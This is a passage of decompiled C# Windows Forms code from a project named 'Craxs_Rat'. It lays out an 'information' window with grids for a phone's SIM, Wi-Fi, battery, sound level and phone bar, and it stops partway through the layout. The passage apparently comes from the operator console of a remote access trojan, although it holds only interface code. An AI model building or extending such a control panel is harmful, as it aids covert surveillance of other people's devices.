namespace Craxs_Rat
{
	// Token: 0x020000D3 RID: 211
	[global::Microsoft.VisualBasic.CompilerServices.DesignerGenerated]
	public partial class information : global::System.Windows.Forms.Form
	{
		// Token: 0x06000FB1 RID: 4017 RVA: 0x000A84B8 File Offset: 0x000A66B8
		protected override void Dispose(bool disposing)
		{
			try
			{
				if (disposing && this.components != null)
				{
					((global::System.IDisposable)this.components).Dispose();
				}
			}
			finally
			{
				base.Dispose(disposing);
			}
		}

		// Token: 0x06000FB2 RID: 4018 RVA: 0x000A84FC File Offset: 0x000A66FC
		private void InitializeComponent()
		{
			this.components = new global::System.ComponentModel.Container();
			global::System.Windows.Forms.DataGridViewCellStyle dataGridViewCellStyle = new global::System.Windows.Forms.DataGridViewCellStyle();
			global::System.Windows.Forms.DataGridViewCellStyle dataGridViewCellStyle2 = new global::System.Windows.Forms.DataGridViewCellStyle();
			global::System.Windows.Forms.DataGridViewCellStyle dataGridViewCellStyle3 = new global::System.Windows.Forms.DataGridViewCellStyle();
			global::System.Windows.Forms.DataGridViewCellStyle dataGridViewCellStyle4 = new global::System.Windows.Forms.DataGridViewCellStyle();
			global::System.Windows.Forms.DataGridViewCellStyle dataGridViewCellStyle5 = new global::System.Windows.Forms.DataGridViewCellStyle();
			global::System.Windows.Forms.DataGridViewCellStyle dataGridViewCellStyle6 = new global::System.Windows.Forms.DataGridViewCellStyle();
			global::System.Windows.Forms.DataGridViewCellStyle dataGridViewCellStyle7 = new global::System.Windows.Forms.DataGridViewCellStyle();
			global::System.Windows.Forms.DataGridViewCellStyle dataGridViewCellStyle8 = new global::System.Windows.Forms.DataGridViewCellStyle();
			global::System.Windows.Forms.DataGridViewCellStyle dataGridViewCellStyle9 = new global::System.Windows.Forms.DataGridViewCellStyle();
			global::System.Windows.Forms.DataGridViewCellStyle dataGridViewCellStyle10 = new global::System.Windows.Forms.DataGridViewCellStyle();
			global::System.Windows.Forms.DataGridViewCellStyle dataGridViewCellStyle11 = new global::System.Windows.Forms.DataGridViewCellStyle();
			global::System.Windows.Forms.DataGridViewCellStyle dataGridViewCellStyle12 = new global::System.Windows.Forms.DataGridViewCellStyle();
			global::System.Windows.Forms.DataGridViewCellStyle dataGridViewCellStyle13 = new global::System.Windows.Forms.DataGridViewCellStyle();
			global::System.Windows.Forms.DataGridViewCellStyle dataGridViewCellStyle14 = new global::System.Windows.Forms.DataGridViewCellStyle();
			this.Panel1 = new global::System.Windows.Forms.Panel();
			this.DGV6 = new global::System.Windows.Forms.DataGridView();
			this.DataGridViewTextBoxColumn6 = new global::System.Windows.Forms.DataGridViewTextBoxColumn();
			this.DataGridViewComboBoxColumn1 = new global::System.Windows.Forms.DataGridViewComboBoxColumn();
			this.LB7 = new global::System.Windows.Forms.Label();
			this.DGV5 = new global::System.Windows.Forms.DataGridView();
			this.DataGridViewTextBoxColumn5 = new global::System.Windows.Forms.DataGridViewTextBoxColumn();
			this.DataGridViewComboBoxColumn3 = new global::System.Windows.Forms.DataGridViewComboBoxColumn();
			this.LB6 = new global::System.Windows.Forms.Label();
			this.DGV4 = new global::System.Windows.Forms.DataGridView();
			this.LB5 = new global::System.Windows.Forms.Label();
			this.DGV3 = new global::System.Windows.Forms.DataGridView();
			this.LB4 = new global::System.Windows.Forms.Label();
			this.DGV2 = new global::System.Windows.Forms.DataGridView();
			this.LB3 = new global::System.Windows.Forms.Label();
			this.DGV1 = new global::System.Windows.Forms.DataGridView();
			this.LB2 = new global::System.Windows.Forms.Label();
			this.DGV0 = new global::System.Windows.Forms.DataGridView();
			this.LB1 = new global::System.Windows.Forms.Label();
			this.TOpacity = new global::System.Windows.Forms.Timer(this.components);
			this.Column1 = new global::System.Windows.Forms.DataGridViewTextBoxColumn();
			this.Column2 = new global::System.Windows.Forms.DataGridViewTextBoxColumn();
			this.DataGridViewTextBoxColumn1 = new global::System.Windows.Forms.DataGridViewTextBoxColumn();
			this.Column6 = new global::System.Windows.Forms.DataGridViewTextBoxColumn();
			this.DataGridViewTextBoxColumn2 = new global::System.Windows.Forms.DataGridViewTextBoxColumn();
			this.Column5 = new global::System.Windows.Forms.DataGridViewTextBoxColumn();
			this.DataGridViewTextBoxColumn3 = new global::System.Windows.Forms.DataGridViewTextBoxColumn();
			this.Column4 = new global::System.Windows.Forms.DataGridViewTextBoxColumn();
			this.DataGridViewTextBoxColumn4 = new global::System.Windows.Forms.DataGridViewTextBoxColumn();
			this.Column3 = new global::System.Windows.Forms.DataGridViewTextBoxColumn();
			this.ctxMenu = new global::System.Windows.Forms.ContextMenuStrip(this.components);
			this.SaveToolStripMenuItem = new global::System.Windows.Forms.ToolStripMenuItem();
			this.SaveAsToolStripMenuItem = new global::System.Windows.Forms.ToolStripMenuItem();
			this.Panel1.SuspendLayout();
			((global::System.ComponentModel.ISupportInitialize)this.DGV6).BeginInit();
			((global::System.ComponentModel.ISupportInitialize)this.DGV5).BeginInit();
			((global::System.ComponentModel.ISupportInitialize)this.DGV4).BeginInit();
			((global::System.ComponentModel.ISupportInitialize)this.DGV3).BeginInit();
			((global::System.ComponentModel.ISupportInitialize)this.DGV2).BeginInit();
			((global::System.ComponentModel.ISupportInitialize)this.DGV1).BeginInit();
			((global::System.ComponentModel.ISupportInitialize)this.DGV0).BeginInit();
			this.ctxMenu.SuspendLayout();
			base.SuspendLayout();
			this.Panel1.AutoScroll = true;
			this.Panel1.BackColor = global::System.Drawing.Color.Black;
			this.Panel1.Controls.Add(this.DGV6);
			this.Panel1.Controls.Add(this.LB7);
			this.Panel1.Controls.Add(this.DGV5);
			this.Panel1.Controls.Add(this.LB6);
			this.Panel1.Controls.Add(this.DGV4);
			this.Panel1.Controls.Add(this.LB5);
			this.Panel1.Controls.Add(this.DGV3);
			this.Panel1.Controls.Add(this.LB4);
			this.Panel1.Controls.Add(this.DGV2);
			this.Panel1.Controls.Add(this.LB3);
			this.Panel1.Controls.Add(this.DGV1);
			this.Panel1.Controls.Add(this.LB2);
			this.Panel1.Controls.Add(this.DGV0);
			this.Panel1.Controls.Add(this.LB1);
			this.Panel1.Dock = global::System.Windows.Forms.DockStyle.Fill;
			this.Panel1.Location = new global::System.Drawing.Point(0, 0);
			this.Panel1.Name = "Panel1";
			this.Panel1.Size = new global::System.Drawing.Size(375, 344);
			this.Panel1.TabIndex = 2;
			this.DGV6.AllowUserToAddRows = false;
			this.DGV6.AllowUserToDeleteRows = false;
			this.DGV6.AllowUserToResizeColumns = false;
			this.DGV6.AllowUserToResizeRows = false;
			this.DGV6.AutoSizeColumnsMode = global::System.Windows.Forms.DataGridViewAutoSizeColumnsMode.Fill;
			this.DGV6.AutoSizeRowsMode = global::System.Windows.Forms.DataGridViewAutoSizeRowsMode.AllCells;
			this.DGV6.BackgroundColor = global::System.Drawing.Color.Black;
			this.DGV6.BorderStyle = global::System.Windows.Forms.BorderStyle.None;
			this.DGV6.CellBorderStyle = global::System.Windows.Forms.DataGridViewCellBorderStyle.None;
			this.DGV6.ColumnHeadersBorderStyle = global::System.Windows.Forms.DataGridViewHeaderBorderStyle.None;
			dataGridViewCellStyle.Alignment = global::System.Windows.Forms.DataGridViewContentAlignment.MiddleLeft;
			dataGridViewCellStyle.BackColor = global::System.Drawing.Color.Black;
			dataGridViewCellStyle.Font = new global::System.Drawing.Font("Arial", 8.25f, global::System.Drawing.FontStyle.Bold, global::System.Drawing.GraphicsUnit.Point, 0);
			dataGridViewCellStyle.ForeColor = global::System.Drawing.Color.White;
			dataGridViewCellStyle.SelectionBackColor = global::System.Drawing.SystemColors.Highlight;
			dataGridViewCellStyle.SelectionForeColor = global::System.Drawing.SystemColors.HighlightText;
			dataGridViewCellStyle.WrapMode = global::System.Windows.Forms.DataGridViewTriState.True;
			this.DGV6.ColumnHeadersDefaultCellStyle = dataGridViewCellStyle;
			this.DGV6.ColumnHeadersHeightSizeMode = global::System.Windows.Forms.DataGridViewColumnHeadersHeightSizeMode.DisableResizing;
			this.DGV6.ColumnHeadersVisible = false;
			this.DGV6.Columns.AddRange(new global::System.Windows.Forms.DataGridViewColumn[]
			{
				this.DataGridViewTextBoxColumn6,
				this.DataGridViewComboBoxColumn1
			});
			dataGridViewCellStyle2.Alignment = global::System.Windows.Forms.DataGridViewContentAlignment.MiddleLeft;
			dataGridViewCellStyle2.BackColor = global::System.Drawing.Color.Black;
			dataGridViewCellStyle2.Font = new global::System.Drawing.Font("Arial", 8.25f, global::System.Drawing.FontStyle.Bold, global::System.Drawing.GraphicsUnit.Point, 0);
			dataGridViewCellStyle2.ForeColor = global::System.Drawing.Color.FromArgb(190, 190, 190);
			dataGridViewCellStyle2.SelectionBackColor = global::System.Drawing.Color.FromArgb(51, 153, 255);
			dataGridViewCellStyle2.SelectionForeColor = global::System.Drawing.Color.Black;
			dataGridViewCellStyle2.WrapMode = global::System.Windows.Forms.DataGridViewTriState.False;
			this.DGV6.DefaultCellStyle = dataGridViewCellStyle2;
			this.DGV6.Dock = global::System.Windows.Forms.DockStyle.Top;
			this.DGV6.EditMode = global::System.Windows.Forms.DataGridViewEditMode.EditOnEnter;
			this.DGV6.EnableHeadersVisualStyles = false;
			this.DGV6.GridColor = global::System.Drawing.Color.FromArgb(42, 42, 42);
			this.DGV6.Location = new global::System.Drawing.Point(0, 914);
			this.DGV6.Name = "DGV6";
			this.DGV6.RowHeadersBorderStyle = global::System.Windows.Forms.DataGridViewHeaderBorderStyle.Single;
			this.DGV6.RowHeadersVisible = false;
			this.DGV6.ScrollBars = global::System.Windows.Forms.ScrollBars.None;
			this.DGV6.SelectionMode = global::System.Windows.Forms.DataGridViewSelectionMode.FullRowSelect;
			this.DGV6.Size = new global::System.Drawing.Size(358, 135);
			this.DGV6.TabIndex = 16;
			this.DataGridViewTextBoxColumn6.AutoSizeMode = global::System.Windows.Forms.DataGridViewAutoSizeColumnMode.Fill;
			this.DataGridViewTextBoxColumn6.FillWeight = 50f;
			this.DataGridViewTextBoxColumn6.HeaderText = "Property";
			this.DataGridViewTextBoxColumn6.Name = "DataGridViewTextBoxColumn6";
			this.DataGridViewTextBoxColumn6.ReadOnly = true;
			this.DataGridViewTextBoxColumn6.SortMode = global::System.Windows.Forms.DataGridViewColumnSortMode.NotSortable;
			this.DataGridViewComboBoxColumn1.AutoSizeMode = global::System.Windows.Forms.DataGridViewAutoSizeColumnMode.Fill;
			this.DataGridViewComboBoxColumn1.DisplayStyle = global::System.Windows.Forms.DataGridViewComboBoxDisplayStyle.ComboBox;
			this.DataGridViewComboBoxColumn1.DisplayStyleForCurrentCellOnly = true;
			this.DataGridViewComboBoxColumn1.FillWeight = 50f;
			this.DataGridViewComboBoxColumn1.FlatStyle = global::System.Windows.Forms.FlatStyle.System;
			this.DataGridViewComboBoxColumn1.HeaderText = "value";
			this.DataGridViewComboBoxColumn1.Name = "DataGridViewComboBoxColumn1";
			this.DataGridViewComboBoxColumn1.Resizable = global::System.Windows.Forms.DataGridViewTriState.False;
			this.LB7.BackColor = global::System.Drawing.Color.FromArgb(45, 45, 48);
			this.LB7.Dock = global::System.Windows.Forms.DockStyle.Top;
			this.LB7.ForeColor = global::System.Drawing.Color.FromArgb(190, 190, 190);
			this.LB7.Location = new global::System.Drawing.Point(0, 890);
			this.LB7.Name = "LB7";
			this.LB7.Padding = new global::System.Windows.Forms.Padding(0, 0, 0, 4);
			this.LB7.Size = new global::System.Drawing.Size(358, 24);
			this.LB7.TabIndex = 15;
			this.LB7.Text = "Phone bar";
			this.LB7.TextAlign = global::System.Drawing.ContentAlignment.MiddleLeft;
			this.DGV5.AllowUserToAddRows = false;
			this.DGV5.AllowUserToDeleteRows = false;
			this.DGV5.AllowUserToResizeColumns = false;
			this.DGV5.AllowUserToResizeRows = false;
			this.DGV5.AutoSizeColumnsMode = global::System.Windows.Forms.DataGridViewAutoSizeColumnsMode.Fill;
			this.DGV5.AutoSizeRowsMode = global::System.Windows.Forms.DataGridViewAutoSizeRowsMode.AllCells;
			this.DGV5.BackgroundColor = global::System.Drawing.Color.Black;
			this.DGV5.BorderStyle = global::System.Windows.Forms.BorderStyle.None;
			this.DGV5.CellBorderStyle = global::System.Windows.Forms.DataGridViewCellBorderStyle.None;
			this.DGV5.ColumnHeadersBorderStyle = global::System.Windows.Forms.DataGridViewHeaderBorderStyle.None;
			dataGridViewCellStyle3.Alignment = global::System.Windows.Forms.DataGridViewContentAlignment.MiddleLeft;
			dataGridViewCellStyle3.BackColor = global::System.Drawing.Color.Black;
			dataGridViewCellStyle3.Font = new global::System.Drawing.Font("Arial", 8.25f, global::System.Drawing.FontStyle.Bold, global::System.Drawing.GraphicsUnit.Point, 0);
			dataGridViewCellStyle3.ForeColor = global::System.Drawing.Color.White;
			dataGridViewCellStyle3.SelectionBackColor = global::System.Drawing.SystemColors.Highlight;
			dataGridViewCellStyle3.SelectionForeColor = global::System.Drawing.SystemColors.HighlightText;
			dataGridViewCellStyle3.WrapMode = global::System.Windows.Forms.DataGridViewTriState.True;
			this.DGV5.ColumnHeadersDefaultCellStyle = dataGridViewCellStyle3;
			this.DGV5.ColumnHeadersHeightSizeMode = global::System.Windows.Forms.DataGridViewColumnHeadersHeightSizeMode.DisableResizing;
			this.DGV5.ColumnHeadersVisible = false;
			this.DGV5.Columns.AddRange(new global::System.Windows.Forms.DataGridViewColumn[]
			{
				this.DataGridViewTextBoxColumn5,
				this.DataGridViewComboBoxColumn3
			});
			dataGridViewCellStyle4.Alignment = global::System.Windows.Forms.DataGridViewContentAlignment.MiddleLeft;
			dataGridViewCellStyle4.BackColor = global::System.Drawing.Color.Black;
			dataGridViewCellStyle4.Font = new global::System.Drawing.Font("Arial", 8.25f, global::System.Drawing.FontStyle.Bold, global::System.Drawing.GraphicsUnit.Point, 0);
			dataGridViewCellStyle4.ForeColor = global::System.Drawing.Color.FromArgb(190, 190, 190);
			dataGridViewCellStyle4.SelectionBackColor = global::System.Drawing.Color.FromArgb(51, 153, 255);
			dataGridViewCellStyle4.SelectionForeColor = global::System.Drawing.Color.Black;
			dataGridViewCellStyle4.WrapMode = global::System.Windows.Forms.DataGridViewTriState.False;
			this.DGV5.DefaultCellStyle = dataGridViewCellStyle4;
			this.DGV5.Dock = global::System.Windows.Forms.DockStyle.Top;
			this.DGV5.EditMode = global::System.Windows.Forms.DataGridViewEditMode.EditOnEnter;
			this.DGV5.EnableHeadersVisualStyles = false;
			this.DGV5.GridColor = global::System.Drawing.Color.FromArgb(42, 42, 42);
			this.DGV5.Location = new global::System.Drawing.Point(0, 795);
			this.DGV5.Name = "DGV5";
			this.DGV5.RowHeadersBorderStyle = global::System.Windows.Forms.DataGridViewHeaderBorderStyle.Single;
			this.DGV5.RowHeadersVisible = false;
			this.DGV5.ScrollBars = global::System.Windows.Forms.ScrollBars.None;
			this.DGV5.SelectionMode = global::System.Windows.Forms.DataGridViewSelectionMode.FullRowSelect;
			this.DGV5.Size = new global::System.Drawing.Size(358, 95);
			this.DGV5.TabIndex = 14;
			this.DataGridViewTextBoxColumn5.AutoSizeMode = global::System.Windows.Forms.DataGridViewAutoSizeColumnMode.Fill;
			this.DataGridViewTextBoxColumn5.FillWeight = 50f;
			this.DataGridViewTextBoxColumn5.HeaderText = "Property";
			this.DataGridViewTextBoxColumn5.Name = "DataGridViewTextBoxColumn5";
			this.DataGridViewTextBoxColumn5.ReadOnly = true;
			this.DataGridViewTextBoxColumn5.SortMode = global::System.Windows.Forms.DataGridViewColumnSortMode.NotSortable;
			this.DataGridViewComboBoxColumn3.AutoSizeMode = global::System.Windows.Forms.DataGridViewAutoSizeColumnMode.Fill;
			this.DataGridViewComboBoxColumn3.DisplayStyle = global::System.Windows.Forms.DataGridViewComboBoxDisplayStyle.ComboBox;
			this.DataGridViewComboBoxColumn3.DisplayStyleForCurrentCellOnly = true;
			this.DataGridViewComboBoxColumn3.FillWeight = 50f;
			this.DataGridViewComboBoxColumn3.FlatStyle = global::System.Windows.Forms.FlatStyle.System;
			this.DataGridViewComboBoxColumn3.HeaderText = "value";
			this.DataGridViewComboBoxColumn3.Name = "DataGridViewComboBoxColumn3";
			this.DataGridViewComboBoxColumn3.Resizable = global::System.Windows.Forms.DataGridViewTriState.False;
			this.LB6.BackColor = global::System.Drawing.Color.FromArgb(45, 45, 48);
			this.LB6.Dock = global::System.Windows.Forms.DockStyle.Top;
			this.LB6.ForeColor = global::System.Drawing.Color.FromArgb(190, 190, 190);
			this.LB6.Location = new global::System.Drawing.Point(0, 771);
			this.LB6.Name = "LB6";
			this.LB6.Padding = new global::System.Windows.Forms.Padding(0, 0, 0, 4);
			this.LB6.Size = new global::System.Drawing.Size(358, 24);
			this.LB6.TabIndex = 13;
			this.LB6.Text = "Sound level";
			this.LB6.TextAlign = global::System.Drawing.ContentAlignment.MiddleLeft;
			this.DGV4.AllowUserToAddRows = false;
			this.DGV4.AllowUserToDeleteRows = false;
			this.DGV4.AllowUserToResizeColumns = false;
			this.DGV4.AllowUserToResizeRows = false;
			this.DGV4.AutoSizeColumnsMode = global::System.Windows.Forms.DataGridViewAutoSizeColumnsMode.Fill;
			this.DGV4.AutoSizeRowsMode = global::System.Windows.Forms.DataGridViewAutoSizeRowsMode.AllCells;
			this.DGV4.BackgroundColor = global::System.Drawing.Color.Black;
			this.DGV4.BorderStyle = global::System.Windows.Forms.BorderStyle.None;
			this.DGV4.CellBorderStyle = global::System.Windows.Forms.DataGridViewCellBorderStyle.None;
			this.DGV4.ColumnHeadersBorderStyle = global::System.Windows.Forms.DataGridViewHeaderBorderStyle.None;
			dataGridViewCellStyle5.Alignment = global::System.Windows.Forms.DataGridViewContentAlignment.MiddleLeft;
			dataGridViewCellStyle5.BackColor = global::System.Drawing.Color.Black;
			dataGridViewCellStyle5.Font = new global::System.Drawing.Font("Arial", 8.25f, global::System.Drawing.FontStyle.Bold, global::System.Drawing.GraphicsUnit.Point, 0);
			dataGridViewCellStyle5.ForeColor = global::System.Drawing.Color.White;
			dataGridViewCellStyle5.SelectionBackColor = global::System.Drawing.SystemColors.Highlight;
			dataGridViewCellStyle5.SelectionForeColor = global::System.Drawing.SystemColors.HighlightText;
			dataGridViewCellStyle5.WrapMode = global::System.Windows.Forms.DataGridViewTriState.True;
			this.DGV4.ColumnHeadersDefaultCellStyle = dataGridViewCellStyle5;
			this.DGV4.ColumnHeadersHeightSizeMode = global::System.Windows.Forms.DataGridViewColumnHeadersHeightSizeMode.DisableResizing;
			this.DGV4.ColumnHeadersVisible = false;
			this.DGV4.Columns.AddRange(new global::System.Windows.Forms.DataGridViewColumn[]
			{
				this.DataGridViewTextBoxColumn4,
				this.Column3
			});
			dataGridViewCellStyle6.Alignment = global::System.Windows.Forms.DataGridViewContentAlignment.MiddleLeft;
			dataGridViewCellStyle6.BackColor = global::System.Drawing.Color.Black;
			dataGridViewCellStyle6.Font = new global::System.Drawing.Font("Arial", 8.25f, global::System.Drawing.FontStyle.Bold, global::System.Drawing.GraphicsUnit.Point, 0);
			dataGridViewCellStyle6.ForeColor = global::System.Drawing.Color.FromArgb(190, 190, 190);
			dataGridViewCellStyle6.SelectionBackColor = global::System.Drawing.Color.FromArgb(51, 153, 255);
			dataGridViewCellStyle6.SelectionForeColor = global::System.Drawing.Color.Black;
			dataGridViewCellStyle6.WrapMode = global::System.Windows.Forms.DataGridViewTriState.False;
			this.DGV4.DefaultCellStyle = dataGridViewCellStyle6;
			this.DGV4.Dock = global::System.Windows.Forms.DockStyle.Top;
			this.DGV4.EditMode = global::System.Windows.Forms.DataGridViewEditMode.EditOnEnter;
			this.DGV4.EnableHeadersVisualStyles = false;
			this.DGV4.GridColor = global::System.Drawing.Color.FromArgb(42, 42, 42);
			this.DGV4.Location = new global::System.Drawing.Point(0, 670);
			this.DGV4.Name = "DGV4";
			this.DGV4.RowHeadersBorderStyle = global::System.Windows.Forms.DataGridViewHeaderBorderStyle.Single;
			this.DGV4.RowHeadersVisible = false;
			this.DGV4.ScrollBars = global::System.Windows.Forms.ScrollBars.None;
			this.DGV4.SelectionMode = global::System.Windows.Forms.DataGridViewSelectionMode.FullRowSelect;
			this.DGV4.Size = new global::System.Drawing.Size(358, 101);
			this.DGV4.TabIndex = 12;
			this.LB5.BackColor = global::System.Drawing.Color.FromArgb(45, 45, 48);
			this.LB5.Dock = global::System.Windows.Forms.DockStyle.Top;
			this.LB5.ForeColor = global::System.Drawing.Color.FromArgb(190, 190, 190);
			this.LB5.Location = new global::System.Drawing.Point(0, 646);
			this.LB5.Name = "LB5";
			this.LB5.Padding = new global::System.Windows.Forms.Padding(0, 0, 0, 4);
			this.LB5.Size = new global::System.Drawing.Size(358, 24);
			this.LB5.TabIndex = 11;
			this.LB5.Text = "Battery";
			this.LB5.TextAlign = global::System.Drawing.ContentAlignment.MiddleLeft;
			this.DGV3.AllowUserToAddRows = false;
			this.DGV3.AllowUserToDeleteRows = false;
			this.DGV3.AllowUserToResizeColumns = false;
			this.DGV3.AllowUserToResizeRows = false;
			this.DGV3.AutoSizeColumnsMode = global::System.Windows.Forms.DataGridViewAutoSizeColumnsMode.Fill;
			this.DGV3.AutoSizeRowsMode = global::System.Windows.Forms.DataGridViewAutoSizeRowsMode.AllCells;
			this.DGV3.BackgroundColor = global::System.Drawing.Color.Black;
			this.DGV3.BorderStyle = global::System.Windows.Forms.BorderStyle.None;
			this.DGV3.CellBorderStyle = global::System.Windows.Forms.DataGridViewCellBorderStyle.None;
			this.DGV3.ColumnHeadersBorderStyle = global::System.Windows.Forms.DataGridViewHeaderBorderStyle.None;
			dataGridViewCellStyle7.Alignment = global::System.Windows.Forms.DataGridViewContentAlignment.MiddleLeft;
			dataGridViewCellStyle7.BackColor = global::System.Drawing.Color.Black;
			dataGridViewCellStyle7.Font = new global::System.Drawing.Font("Arial", 8.25f, global::System.Drawing.FontStyle.Bold, global::System.Drawing.GraphicsUnit.Point, 0);
			dataGridViewCellStyle7.ForeColor = global::System.Drawing.Color.White;
			dataGridViewCellStyle7.SelectionBackColor = global::System.Drawing.SystemColors.Highlight;
			dataGridViewCellStyle7.SelectionForeColor = global::System.Drawing.SystemColors.HighlightText;
			dataGridViewCellStyle7.WrapMode = global::System.Windows.Forms.DataGridViewTriState.True;
			this.DGV3.ColumnHeadersDefaultCellStyle = dataGridViewCellStyle7;
			this.DGV3.ColumnHeadersHeightSizeMode = global::System.Windows.Forms.DataGridViewColumnHeadersHeightSizeMode.DisableResizing;
			this.DGV3.ColumnHeadersVisible = false;
			this.DGV3.Columns.AddRange(new global::System.Windows.Forms.DataGridViewColumn[]
			{
				this.DataGridViewTextBoxColumn3,
				this.Column4
			});
			dataGridViewCellStyle8.Alignment = global::System.Windows.Forms.DataGridViewContentAlignment.MiddleLeft;
			dataGridViewCellStyle8.BackColor = global::System.Drawing.Color.Black;
			dataGridViewCellStyle8.Font = new global::System.Drawing.Font("Arial", 8.25f, global::System.Drawing.FontStyle.Bold, global::System.Drawing.GraphicsUnit.Point, 0);
			dataGridViewCellStyle8.ForeColor = global::System.Drawing.Color.FromArgb(190, 190, 190);
			dataGridViewCellStyle8.SelectionBackColor = global::System.Drawing.Color.FromArgb(51, 153, 255);
			dataGridViewCellStyle8.SelectionForeColor = global::System.Drawing.Color.Black;
			dataGridViewCellStyle8.WrapMode = global::System.Windows.Forms.DataGridViewTriState.False;
			this.DGV3.DefaultCellStyle = dataGridViewCellStyle8;
			this.DGV3.Dock = global::System.Windows.Forms.DockStyle.Top;
			this.DGV3.EditMode = global::System.Windows.Forms.DataGridViewEditMode.EditOnEnter;
			this.DGV3.EnableHeadersVisualStyles = false;
			this.DGV3.GridColor = global::System.Drawing.Color.FromArgb(42, 42, 42);
			this.DGV3.Location = new global::System.Drawing.Point(0, 557);
			this.DGV3.Name = "DGV3";
			this.DGV3.RowHeadersBorderStyle = global::System.Windows.Forms.DataGridViewHeaderBorderStyle.Single;
			this.DGV3.RowHeadersVisible = false;
			this.DGV3.ScrollBars = global::System.Windows.Forms.ScrollBars.None;
			this.DGV3.SelectionMode = global::System.Windows.Forms.DataGridViewSelectionMode.FullRowSelect;
			this.DGV3.Size = new global::System.Drawing.Size(358, 89);
			this.DGV3.TabIndex = 10;
			this.LB4.BackColor = global::System.Drawing.Color.FromArgb(45, 45, 48);
			this.LB4.Dock = global::System.Windows.Forms.DockStyle.Top;
			this.LB4.ForeColor = global::System.Drawing.Color.FromArgb(190, 190, 190);
			this.LB4.Location = new global::System.Drawing.Point(0, 533);
			this.LB4.Name = "LB4";
			this.LB4.Padding = new global::System.Windows.Forms.Padding(0, 0, 0, 4);
			this.LB4.Size = new global::System.Drawing.Size(358, 24);
			this.LB4.TabIndex = 9;
			this.LB4.Text = "Wi-Fi";
			this.LB4.TextAlign = global::System.Drawing.ContentAlignment.MiddleLeft;
			this.DGV2.AllowUserToAddRows = false;
			this.DGV2.AllowUserToDeleteRows = false;
			this.DGV2.AllowUserToResizeColumns = false;
			this.DGV2.AllowUserToResizeRows = false;
			this.DGV2.AutoSizeColumnsMode = global::System.Windows.Forms.DataGridViewAutoSizeColumnsMode.Fill;
			this.DGV2.AutoSizeRowsMode = global::System.Windows.Forms.DataGridViewAutoSizeRowsMode.AllCells;
			this.DGV2.BackgroundColor = global::System.Drawing.Color.Black;
			this.DGV2.BorderStyle = global::System.Windows.Forms.BorderStyle.None;
			this.DGV2.CellBorderStyle = global::System.Windows.Forms.DataGridViewCellBorderStyle.None;
			this.DGV2.ColumnHeadersBorderStyle = global::System.Windows.Forms.DataGridViewHeaderBorderStyle.None;
			dataGridViewCellStyle9.Alignment = global::System.Windows.Forms.DataGridViewContentAlignment.MiddleLeft;
			dataGridViewCellStyle9.BackColor = global::System.Drawing.Color.Black;
			dataGridViewCellStyle9.Font = new global::System.Drawing.Font("Arial", 8.25f, global::System.Drawing.FontStyle.Bold, global::System.Drawing.GraphicsUnit.Point, 0);
			dataGridViewCellStyle9.ForeColor = global::System.Drawing.Color.White;
			dataGridViewCellStyle9.SelectionBackColor = global::System.Drawing.SystemColors.Highlight;
			dataGridViewCellStyle9.SelectionForeColor = global::System.Drawing.SystemColors.HighlightText;
			dataGridViewCellStyle9.WrapMode = global::System.Windows.Forms.DataGridViewTriState.True;
			this.DGV2.ColumnHeadersDefaultCellStyle = dataGridViewCellStyle9;
			this.DGV2.ColumnHeadersHeightSizeMode = global::System.Windows.Forms.DataGridViewColumnHeadersHeightSizeMode.DisableResizing;
			this.DGV2.ColumnHeadersVisible = false;
			this.DGV2.Columns.AddRange(new global::System.Windows.Forms.DataGridViewColumn[]
			{
				this.DataGridViewTextBoxColumn2,
				this.Column5
			});
			dataGridViewCellStyle10.Alignment = global::System.Windows.Forms.DataGridViewContentAlignment.MiddleLeft;
			dataGridViewCellStyle10.BackColor = global::System.Drawing.Color.Black;
			dataGridViewCellStyle10.Font = new global::System.Drawing.Font("Arial", 8.25f, global::System.Drawing.FontStyle.Bold, global::System.Drawing.GraphicsUnit.Point, 0);
			dataGridViewCellStyle10.ForeColor = global::System.Drawing.Color.FromArgb(190, 190, 190);
			dataGridViewCellStyle10.SelectionBackColor = global::System.Drawing.Color.FromArgb(51, 153, 255);
			dataGridViewCellStyle10.SelectionForeColor = global::System.Drawing.Color.Black;
			dataGridViewCellStyle10.WrapMode = global::System.Windows.Forms.DataGridViewTriState.False;
			this.DGV2.DefaultCellStyle = dataGridViewCellStyle10;
			this.DGV2.Dock = global::System.Windows.Forms.DockStyle.Top;
			this.DGV2.EditMode = global::System.Windows.Forms.DataGridViewEditMode.EditOnEnter;
			this.DGV2.EnableHeadersVisualStyles = false;
			this.DGV2.GridColor = global::System.Drawing.Color.FromArgb(42, 42, 42);
			this.DGV2.Location = new global::System.Drawing.Point(0, 401);
			this.DGV2.Name = "DGV2";
			this.DGV2.RowHeadersBorderStyle = global::System.Windows.Forms.DataGridViewHeaderBorderStyle.Single;
			this.DGV2.RowHeadersVisible = false;
			this.DGV2.ScrollBars = global::System.Windows.Forms.ScrollBars.None;
			this.DGV2.SelectionMode = global::System.Windows.Forms.DataGridViewSelectionMode.FullRowSelect;
			this.DGV2.Size = new global::System.Drawing.Size(358, 132);
			this.DGV2.TabIndex = 8;
			this.LB3.BackColor = global::System.Drawing.Color.FromArgb(45, 45, 48);
			this.LB3.Dock = global::System.Windows.Forms.DockStyle.Top;
			this.LB3.ForeColor = global::System.Drawing.Color.FromArgb(190, 190, 190);
			this.LB3.Location = new global::System.Drawing.Point(0, 377);
			this.LB3.Name = "LB3";
			this.LB3.Padding = new global::System.Windows.Forms.Padding(0, 0, 0, 4);
			this.LB3.Size = new global::System.Drawing.Size(358, 24);
			this.LB3.TabIndex = 7;
			this.LB3.Text = "SIM";
			this.LB3.TextAlign = global::System.Drawing.ContentAlignment.MiddleLeft;
			this.DGV1.AllowUserToAddRows = false;
			this.DGV1.AllowUserToDeleteRows = false;
			this.DGV1.AllowUserToResizeColumns = false;
			this.DGV1.AllowUserToResizeRows = false;
			this.DGV1.AutoSizeColumnsMode = global::System.Windows.Forms.DataGridViewAutoSizeColumnsMode.Fill;
			this.DGV1.AutoSizeRowsMode = global::System.Windows.Forms.DataGridViewAutoSizeRowsMode.AllCells;
			this.DGV1.BackgroundColor = global::System.Drawing.Color.Black;
			this.DGV1.BorderStyle = global::System.Windows.Forms.BorderStyle.None;
			this.DGV1.CellBorderStyle = global::System.Windows.Forms.DataGridViewCellBorderStyle.None;
			this.DGV1.ColumnHeadersBorderStyle = global::System.Windows.Forms.DataGridViewHeaderBorderStyle.None;
			dataGridViewCellStyle11.Alignment = global::System.Windows.Forms.DataGridViewContentAlignment.MiddleLeft;
			dataGridViewCellStyle11.BackColor = global::System.Drawing.Color.Black;
